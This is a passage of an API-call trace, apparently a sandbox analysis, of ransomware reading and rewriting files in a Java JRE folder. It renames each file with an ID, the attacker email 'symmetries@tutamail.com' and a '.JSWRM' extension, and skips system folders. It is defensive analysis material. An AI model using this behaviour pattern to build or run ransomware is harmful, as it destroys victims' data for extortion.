CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0071.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0071.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.600] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x19c1c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="tzdb.dat", cAlternateFileName="")) returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2=".") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="..") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="...") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="windows") returned -1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="recovery") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="perflogs") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="documents and settings") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="$RECYCLE.BIN") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="system volume information") returned 1 [0071.600] lstrcmpiW (lpString1="tzdb.dat", lpString2="msocache") returned 1 [0071.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0071.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzdb.dat", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzdb.dat", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tzdb.dat", lpUsedDefaultChar=0x0) returned 8 [0071.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0071.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0071.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzdb.dat", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzdb.dat", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tzdb.dat", lpUsedDefaultChar=0x0) returned 8 [0071.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0071.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0071.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0071.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0071.601] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.601] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=105500) returned 1 [0071.601] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19c10) returned 0x24d1d8 [0071.601] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x19c10, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x19c10, lpOverlapped=0x0) returned 1 [0071.609] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.609] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x19c10, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x19c10, lpOverlapped=0x0) returned 1 [0071.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.611] CloseHandle (hObject=0x454) returned 1 [0071.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0071.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0071.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0071.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0071.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0071.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0071.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0071.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.612] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0071.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0071.612] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x20d0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="tzmappings", cAlternateFileName="TZMAPP~1")) returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2=".") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="..") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="...") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="windows") returned -1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="recovery") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="perflogs") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="documents and settings") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="$RECYCLE.BIN") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="system volume information") returned 1 [0071.612] lstrcmpiW (lpString1="tzmappings", lpString2="msocache") returned 1 [0071.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0071.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzmappings", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzmappings", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tzmappings", lpUsedDefaultChar=0x0) returned 10 [0071.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0071.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0071.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzmappings", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzmappings", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tzmappings", lpUsedDefaultChar=0x0) returned 10 [0071.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0071.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0071.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0071.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0071.613] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.614] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=8400) returned 1 [0071.614] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20d0) returned 0x24d1d8 [0071.615] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x20d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x20d0, lpOverlapped=0x0) returned 1 [0071.616] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.616] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x20d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x20d0, lpOverlapped=0x0) returned 1 [0071.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.617] CloseHandle (hObject=0x454) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0071.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0071.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0071.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0071.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0071.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0071.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.713] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0071.713] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x20d0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="tzmappings", cAlternateFileName="TZMAPP~1")) returned 0 [0071.714] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0071.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0071.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0071.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0071.714] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2=".") returned 1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="..") returned 1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="...") returned 1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="windows") returned -1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="recovery") returned -1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="perflogs") returned -1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="documents and settings") returned 1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="$RECYCLE.BIN") returned 1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="system volume information") returned -1 [0071.714] lstrcmpiW (lpString1="LICENSE", lpString2="msocache") returned -1 [0071.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICENSE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICENSE", cchWideChar=7, lpMultiByteStr=0x345f2a8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LICENSE", lpUsedDefaultChar=0x0) returned 7 [0071.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICENSE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICENSE", cchWideChar=7, lpMultiByteStr=0x345f278, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LICENSE", lpUsedDefaultChar=0x0) returned 7 [0071.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0071.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0071.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0071.714] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0071.715] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=40) returned 1 [0071.715] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0071.715] ReadFile (in: hFile=0x298, lpBuffer=0x241268, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x241268*, lpNumberOfBytesRead=0x345ef6c*=0x20, lpOverlapped=0x0) returned 1 [0071.716] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.716] WriteFile (in: hFile=0x298, lpBuffer=0x241268*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x241268*, lpNumberOfBytesWritten=0x345ef68*=0x20, lpOverlapped=0x0) returned 1 [0071.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0071.716] CloseHandle (hObject=0x298) returned 1 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0071.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0071.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.716] HeapFree (in: 